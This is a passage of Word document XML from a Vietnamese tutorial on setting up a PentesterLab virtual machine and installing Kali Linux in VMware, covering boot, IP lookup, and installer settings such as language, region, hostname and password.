      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta nhấn vào Power on this virtual machine để khởi động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32565B70" w14:textId="65C5840B" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00640205">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="49FF2D78">
          <v:shape id="Hình ảnh 23" o:spid="_x0000_i1038" type="#_x0000_t75" style="width:382.5pt;height:270pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE94FB" w14:textId="2B628219" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 8: Sau khi khởi động hoàn tất,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ta gõ lệnh ifconfig để xem thông tin địa chỉ IP của máy ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A62AFE" w14:textId="4EDED2E0" w:rsidR="00EB6477" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00EB6477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7BFB97FE">
          <v:shape id="Hình ảnh 25" o:spid="_x0000_i1039" type="#_x0000_t75" style="width:447pt;height:170.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0735F674" w14:textId="2A95ED66" w:rsidR="008F0013" w:rsidRPr="00F12C2B" w:rsidRDefault="00EB6477" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 9:</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta thu được địa chỉ IP của máy ảo là: 192.168.111.152.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành paste địa chỉ vào trình </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>duyệt,ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E119FF" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sẽ vào được trang chủ web của server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64427CCE" w14:textId="74D129AD"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29A33266">
          <v:shape id="Hình ảnh 26" o:spid="_x0000_i1040" type="#_x0000_t75" style="width:468pt;height:168.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId25" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAE38B" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Như vậy quá trình cài đặt và khởi chạy đến đây là hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB83D3D"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Tiếp theo ta tiến hành cài đặt hệ điều hành </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dùng để hỗ trợ cho việc khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30121CA9" w14:textId="0F60C8B3" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ꞏ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kali linux là bản phân phối linux có nguồn gốc Debian,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>được thế kế cho pháp y kỹ thuật số và tấn công thăm dò và là một mã nguồn mở</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(open source</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>).Nó</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được sử dụng nhiều trong lĩnh vực bảo mật,kiểm thử xâm nhập,hacker xâm nhập hay những chuyên gia về bảo mật muốn bảo vệ các tài nguyên thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E24E85" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các bước cài đặt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB16F7" w14:textId="0F004309" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Ta truy cập vào trang chủ Kali linux và tiến hành Downloads bản kali linux 64-bit</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(Installer) cho máy ảo Vmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DCC29E" w14:textId="7F77F1D0"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27F5101D">
          <v:shape id="Hình ảnh 28" o:spid="_x0000_i1041" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A230CC6" w14:textId="1818791A" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 2: Sau khi quá trình downloads hoàn thành ta tiến hành setup file ISO kali linux tương tự như quá trình setup file ISO của pentesterlab như trên.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta thu được kết quả như hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADFEEB" w14:textId="447D4C33"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41D5DC9D">
          <v:shape id="Hình ảnh 29" o:spid="_x0000_i1042" type="#_x0000_t75" style="width:468pt;height:351pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId27" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="071941EF"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Bước 3: Ta nhấn vào nút </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Power on this machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để khởi động và tiến hành cài đặt hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F032904" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Khi kali linux hiện menu cài đặt ta chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graphical Install</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>” như hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67496B52" w14:textId="7DEAA332" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>*Lưu ý:</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>đối với các bản cài đặt củ trở về trước như: 2019.3,2018.1 ta chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Installer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A72626" w14:textId="7CBBF8F7"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0F13915B">
          <v:shape id="Hình ảnh 30" o:spid="_x0000_i1043" type="#_x0000_t75" style="width:468pt;height:320.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F2EDC" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 4: Cấu hình một số vấn đề cơ bản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25658A76"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Chọn ngôn ngữ hiển thị là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>English</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D90DB" w14:textId="56EBD429"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7D238680">
          <v:shape id="Hình ảnh 34" o:spid="_x0000_i1044" type="#_x0000_t75" style="width:468pt;height:269.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId29" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B000B" w14:textId="2D83C3AE" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn khu vực của bạn.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở đây tôi chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>United States</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.Cứ chọn một nước bất kì sau khi sử dụng ta có thể setup về khu vực Hồ Chí Minh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD81B5" w14:textId="7342B7B1"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3550AE7D">
          <v:shape id="Hình ảnh 35" o:spid="_x0000_i1045" type="#_x0000_t75" style="width:468pt;height:330.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId30" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255E32F" w14:textId="32F6B045" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn loại bàn phím sử dụng.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>American English</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9412B" w14:textId="18D10F06"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078F2026">
          <v:shape id="Hình ảnh 36" o:spid="_x0000_i1046" type="#_x0000_t75" style="width:468pt;height:245.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45BFDA" w14:textId="3CD51A89" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 5:</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cài đặt cấu hình thông tin của hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADDCEA2"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Đặt </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho hệ điều hành của bạn và nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CFEC8" w14:textId="3422670F"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3E253300">
          <v:shape id="Hình ảnh 37" o:spid="_x0000_i1047" type="#_x0000_t75" style="width:468pt;height:351pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId32" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D72814" w14:textId="5667E0F2" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Domain name bạn có thể đặt hoặc bỏ qua.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở đây tôi bỏ qua và chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172976E9" w14:textId="6A2D8252" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành đặt mật khẩu cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của bạn</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>(đối với bản 2019 trở về trước user mặc định là root</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>).Ở</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đây tôi lấy ví dụ mật khẩu là 123.Bạn nên đặt mật khẩu của mình phức tạp,sau đó chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
